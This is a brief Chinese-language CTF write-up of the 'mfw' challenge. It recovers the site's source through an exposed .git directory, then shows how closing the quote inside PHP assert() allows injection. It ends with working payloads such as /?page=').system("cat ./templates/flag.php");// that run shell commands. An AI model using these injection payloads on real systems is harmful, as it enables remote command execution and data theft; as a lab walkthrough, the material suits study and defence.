mfw git泄露构造闭合

这题也挺有想法 第一次确实没有想到

首先我们可以扫出 git

然后

我们githack 泄露一下

然后我们看index.php代码

复制代码
<?php

if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

问题代码出现在

复制代码
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

这里的参数是可以闭合的 因为是可控的


我们构造 ')


assert("strpos('')', '..') === false") or die("Detected hacking attempt!");

然后我们可以在后面面接上其他php语句


这里有两个


').system("ls");//


或者

') or system("ls");//

最后payload

就是替换为cat即可

复制代码
/?page=').system("cat ./templates/flag.php");//
相关推荐
python_1361 天前
git常见冲突场景及解决办法
git
洛小豆1 天前
Git 打标签完全指南:从本地创建到远端推送
前端·git·github
王道长服务器 | 亚马逊云1 天前
一个迁移案例:从传统 IDC 到 AWS 的真实对比
java·spring boot·git·云计算·github·dubbo·aws
嘟嘟可在哪里。1 天前
IntelliJ IDEA git凭据帮助程序
java·git·intellij-idea
xiaok2 天前
分支管理提交代码
git·gitlab·github
谢尔登2 天前
【Git】merge 分类
git
NiKo_W2 天前
Git 版本回退与撤销修改
开发语言·git·安全
渣渣小码2 天前
GIT客户端配置支持中文
git·git中文显示
鄃鳕2 天前
Git 拒绝 pull,本地有未提交的修改
git
Leslie_Lei2 天前
【Eclipse】eclipse打开git拉取的项目
java·git·eclipse